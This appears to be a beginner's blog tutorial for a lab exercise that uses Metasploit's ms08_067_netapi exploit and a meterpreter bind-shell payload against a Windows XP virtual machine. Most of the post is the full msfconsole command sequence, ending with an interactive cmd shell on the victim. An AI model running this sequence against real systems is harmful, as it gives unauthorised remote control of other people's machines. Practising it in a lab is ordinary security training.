In this article I will show you how easily you can exploit a system running windows XP using the netapi exploit.
Before we start, if you think what is the point of exploiting an old version of windows? well my answer is, you gotta take baby steps before you can run.
LAB SETUP:
-> a windows XP virtual machine with SP2/SP3 (I used SP2)
-> a kali Virtual machine / standalone system
I will leave finding the host on network and identifying the services being run to you.
Assuming you have found the IP address of your victim which is say 192.168.1.5 and your attacker machine is at 192.168.1.6
In your terminal on Kali, open up metasploit:
usr->share->metasploit-framework
In here you will find: msfconsole, run it (takes a moment to open)
Now we will search the netapi exploit
msf>search netapi
you will be shown a number of result among which you will find:
exploit/windows/smb/ms08_067_netapi
copy this and paste as follows
msf>use exploit/windows/smb/ms08_067_netapi
now you will get
msf exploit(ms08_067_netapi)>
on screen.
Exploit is chosen, now we need to set certain parameters for this exploit.
msf exploit(ms08_067_netapi)> show options
set up rhost and rport(if not set by default)
set RHOST (the remote host or the victim) as follows
msf exploit(ms08_067_netapi)> set rhost 192.168.1.5
port number for the remote host is set 445 by default.
Now our exploit is ready, but we need a payload for the exploitation.
There are a number of payloads available which can be searched as follows
msf exploit(ms08_067_netapi)>search payload
I have tried bind shell and reverse shell, here we will go with bind shell.
msf exploit(ms08_067_netapi)> set payload windows/meterpreter/bind_tcp
Just like we set certain parameters for exploit before, we need to do the same here.
msf exploit(ms08_067_netapi)> show options
set lport and lhost, which are the port number and ip address of the local machine/attacker machine.
msf exploit(ms08_067_netapi)>set lhost 192.168.1.6
now we are all set.
msf exploit(ms08_067_netapi)> exploit
If you have followed the steps correctly, you will be presented with a meterpreter prompt.
now to get the windows cmd, type in the following command.
meterpreter> execute -f cmd.exe -c -H
a channel will be created in the following output form
‘ channel 1 created’
meterpreter> interact 1
and you will have the cmd of the victim!!
while choosing the exploit you can use: >show target to know which all OS are vulnerable to this exploit.
The exploitation could have been done with
windows/shell_bind_tcp but i went for the meterpreter command.
read about meterpreter to know why.
here are a few links that you may find useful.
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
http://resources.infosecinstitute.com/icmp-reverse-shell/
https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
No comments:
Post a Comment